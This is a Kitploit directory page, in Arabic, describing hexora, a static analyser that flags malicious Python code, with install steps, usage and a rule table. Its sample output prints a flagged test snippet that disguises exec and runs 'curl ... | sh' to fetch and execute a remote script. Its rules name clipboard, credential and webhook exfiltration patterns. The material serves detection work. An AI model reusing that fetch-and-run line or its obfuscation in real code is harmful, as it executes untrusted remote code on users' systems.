Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
hexora — تحليل ثابت للكود الخبيث بلغة بايثون | Kitploit
أدوات/GitHubGitHub/rushter/hexora
إدارة مؤشرات الاختراق (IOC)التحليل الثابتتحليل الثغرات الأمنيةتحليل الكودتحليل البرمجيات الخبيثةأمن سلسلة التوريدتعلم الآلة
GitHubrushter/hexora

hexora

تحليل ثابت للكود الخبيث بلغة بايثون

عرض المستودع
1688منذ 14 أيامتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

hexora

PyPI - Version

هيكسورا هي أداة تحليل ثابتة مصممة لاكتشاف الأنماط الضارة والخطيرة في كود بايثون. تجمع بين محرك تحليل ثابت قائم على القواعد ونموذج تعلّم آلي يُسجّل ملفات المصدر بأكملها لتصنيفها كضارة أو حميدة.

يمكن استخدامها من أجل:

  • تدقيق تبعيات المشاريع لرصد هجمات سلسلة التوريد المحتملة
  • اكتشاف البرامج النصية الضارة الموجودة على منصات مثل Pastebin أو GitHub أو الأدلة المفتوحة
  • تحليل ملفات مؤشرات الاختراق (IoC) من حوادث أمنية سابقة
  • تدقيق الحزم الجديدة المرفوعة إلى PyPi.
مثال هيكسورا

أمثلة

للاطلاع على أمثلة للمخرجات، يرجى زيارة ملف docs/examples.md.

التثبيت

باستخدام بايثون

يتطلب بايثون 3.9+.

root@kitploit:~
pip install hexora

باستخدام uv:

root@kitploit:~
uv tool install hexora

الاستخدام

root@kitploit:~
hexora --help

تدقيق ملف واحد

root@kitploit:~
>  hexora audit test.py

warning[HX2000]: القراءة من الحافظة قد تُستخدم لتسريب بيانات حساسة.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = الثقة: عالية
    المساعدة: الوصول إلى الحافظة يمكن استخدامه لتسريب بيانات حساسة مثل كلمات المرور والمفاتيح.
    النتيجة المستندة إلى التعلم الآلي للملف: 0.93

warning[HX3000]: تنفيذ محتمل لكود غير مرغوب
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

تدقيق دليل

root@kitploit:~
hexora audit --output-format terminal resources/test/

تدقيق الحزم من البيئة الافتراضية

root@kitploit:~
hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

حيث python3.11 هو إصدار بايثون في البيئة الافتراضية.

نصائح:

  • استخدم --exclude لكبت بعض رموز القواعد (مثل الاستيرادات المزعجة) لجولة معينة
  • استخدم --min-confidence للتركيز على النتائج عالية الثقة فقط.

تشير الثقة إلى مدى احتمالية أن يكون جزء معين من الكود خبيثًا. بعض المكتبات أو مقتطفات الكود تُستخدم لأغراض مشروعة، ومن الصعب التمييز بين حالات الاستخدام المشروعة والحالات الخبيثة. ولهذا السبب، بعض التطابقات تكون ذات مستوى ثقة منخفض.

بعض القواعد يمكن أن يكون لها مستويات ثقة مختلفة. تجنب تصفية الكثير من القواعد بواسطة الرموز إلا إذا كنت واثقًا جدًا. على سبيل المثال، تنفيذ الكود والأوامر يمكن أن يكون ذو ثقة متوسطة أو عالية أو عالية جدًا. هذا يعتمد على كيفية تنفيذ الكود. إذا اكتشفنا محاولة تمويه، نرفع مستوى الثقة.

على سبيل المثال، هذا الكود سيكون ذو ثقة عالية:

root@kitploit:~
globals()["__builtins__"].eval("print(123)")

الاستخدام في بايثون

root@kitploit:~
>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'يمكن استخدام pyperclip لنسخ ولصق البيانات من الحافظة.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'القراءة من الحافظة قد تُستخدم لتسريب بيانات حساسة.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # تدقيق ملف واحد
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...

الاختبار مقابل مجموعة بيانات ضارة

عند تطوير قواعد جديدة، يمكنك استخدام مجموعات بيانات ضارة موجودة مثل مجموعة بيانات الحزم البرمجية الضارة.

بعد الاستنساخ، وجّه أداة المقارنة إلى دليل مجموعة البيانات:

root@kitploit:~
cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

القواعد المتاحة

تتم إضافة قواعد جديدة بانتظام.

حاليًا، القواعد التالية متاحة:

الإسناد

للتحليل، نستخدم محلل AST من مكتبة ruff.

تنزيل الأداة
الرمزالاسمالوصف
HX1000تعداد التطبيقاتتعداد مشبوه للتطبيقات.
HX1010تعداد المتصفحاتتعداد مشبوه للمتصفحات (التطبيقات، الكوكيز، السجل، إلخ).
HX1020تعداد المساراتتعداد مشبوه للمسارات.
HX1030بصمة نظام التشغيلبصمة مشبوهة لنظام التشغيل.
HX2000قراءة الحافظةالقراءة من الحافظة.
HX2010الوصول إلى المتغيرات البيئيةالوصول إلى متغير بيئي حساس.
HX2020التقاط لقطة شاشةالتقاط لقطات شاشة من العرض.
HX3000تنفيذ كودتنفيذ كود محتمل.
HX3010تنفيذ أوامر شلتنفيذ أمر شل.
HX3040حقن DLLحقن DLL محتمل.
HX3050تنفيذ خطيرتنفيذ أمر خطير داخل أمر شل.
HX3060استدعاء مشبوهاستدعاء دالة مشبوه.
HX4000تنفيذ أوامر شل مموهةتنفيذ أمر شل ربما مموه.
HX4010تنفيذ كود مموهتنفيذ كود ربما مموه.
HX5000استيراد dunderاستخدام مشبوه لـ __import__.
HX5010استيراد مشبوهاستيراد مشبوه.
HX5020استيراد ctypesاستيراد ctypes مشبوه.
HX5030استيراد pickleاستيراد pickle مشبوه.
HX5040استيراد structاستيراد struct مشبوه.
HX5050استيراد socketاستيراد socket مشبوه.
HX5060استيراد marshalاستيراد marshal مشبوه.
HX6000سلسلة Base64تم اكتشاف سلسلة طويلة مشفرة بـ Base64؛ احتمال تمويه الكود.
HX6010قيم حرفية سداسية عشريةتم اكتشاف قائمة من القيم الحرفية المشفرة سداسيًا؛ احتمال حمولة.
HX6020سلسلة سداسية عشريةتم اكتشاف سلسلة طويلة مشفرة سداسيًا؛ احتمال حمولة.
HX6030قيم صحيحة حرفيةتم اكتشاف قائمة كبيرة من القيم الصحيحة الحرفية؛ احتمال تمويه الكود.
HX6040CVE في قيمة حرفيةتحتوي القيمة الحرفية على معرف CVE.
HX6050قيمة حرفية مشبوهةتم اكتشاف قيمة حرفية مشبوهة؛ احتمال تعداد بيانات.
HX6060اجتياز المساراجتياز مسار مشبوه.
HX6070إضافة متصفحتعداد إضافات متصفح حساسة.
HX6080Webhookتم اكتشاف webhook مشبوه. احتمال تسريب بيانات.
HX6090رمز Telegramتم اكتشاف رمز بوت Telegram في قيمة سلسلة حرفية.
HX7000اسم دالة مشبوهاسم دالة مشبوه.
HX7010اسم معامل مشبوهاسم معامل مشبوه.
HX7020اسم متغير مشبوهاسم متغير مشبوه.
HX9000تسريب بياناتتسريب بيانات محتمل.
HX8000تنزيل ثنائيتنزيل ثنائي مشبوه.
HX8010متغير builtinsاستخدام مشبوه لمتغير builtin.
HX8020تعليق مشبوهتعليق مشبوه.
HX8030كتابة مشبوهةكتابة مشبوهة إلى نظام الملفات.
HX8040خطاف التثبيتإعداد خطاف تثبيت مشبوه.